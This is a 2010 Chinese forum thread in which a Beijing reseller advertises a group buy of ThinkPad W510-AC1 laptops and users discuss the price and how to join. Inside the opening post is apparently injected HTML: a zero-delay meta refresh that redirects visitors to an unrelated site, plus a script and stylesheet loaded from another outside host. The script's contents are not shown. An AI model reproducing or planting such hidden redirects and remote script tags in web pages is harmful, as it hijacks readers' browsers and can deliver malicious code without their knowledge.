开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

W510团购活动(四核+SSD+1G显卡),全国团购第二波(已结束)

W510-AC1
英国
i7-720
1.60G

四核
4G
2*2G
128G
SSD
DVDRW
Nvidia
FX880M
1G
15.6寸宽屏
1600*900
广色域屏

LED背光
蓝牙/摄像头/USB3.0/9芯电池

由于这次货源相当不错,翔意也是第一次组织团购,所以我们零利润销售。本次团购价格为10800元,就可以带走四核CPU+SSD的W510回家。
(跟i7 CPU的普通硬盘版T410价格相当,可以参考翔意报价)

觉得硬盘空间不够可以使用“硬盘支架+500G笔记本硬盘(翔意售价600元)”的方式解决,另有原装双肩包供应。

本次最低5人成团(全国客户均可参加,可在翔意各地分公司交货),欢迎在本贴内组团。也可以到处寻找需要W510的朋友,组好后,团长通过任意联系方式联系我即可(签名里有我的联系方式)。成团后即可以团购价格分别来公司购买。

参加团购的人也可以PM我,凑够5人即可成团

本机零售价格为11500元。

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

比上次的贵了300哦
比上次的贵了300哦
woodls1314 发表于 2010-8-30 09:33

是的,说了第一次不赚钱
配置确认很牛啊
看着真是让人眼红啊。
哪天出x201不赚钱的时候叫一声! 嘿嘿  少赚点也叫声
w510真火~~~
W510 确实是好机器啊.. 好东西不火都难啊...
的确是很火爆,使用W510-AC1围观中。。。。
的确是很火爆,使用W510-AC1围观中。。。。
xynbnb 发表于 2010-8-31 13:48
ID很nb。。。

回复 11# admini 的帖子

彼此,彼此

P.S. 'XY'是鄙人的拼音字头。
回复  admini 的帖子

彼此,彼此

P.S. 'XY'是鄙人的拼音字头。
...
xynbnb 发表于 2010-8-31 23:53
好吧,你申请当xy大使吧~~~

就是的,怎么贵了啊好像tompda帖子上面团购价还是10500的样?
就是的,怎么贵了啊好像tompda帖子上面团购价还是10500的样?
lspwww 发表于 2010-9-1 15:38
成本所限,抱歉。现在已经统一价格为10800,tompda上的价格也是10800了。
回复 13# admini 的帖子

好滴,我的拙劣评测:W510 AC-1 新加坡
好吧,你申请当xy大使吧~~~
admini 发表于 2010-9-1 13:11

形象代言人吧  要是个美女就好了
怎么参加团购?
您如果参加的话,请PM我,或者自己组织到5人。
报个名,不知什么时间能组织起来
这个配置很好很强大,就是大了点~~
真是好东西....就是个儿太大了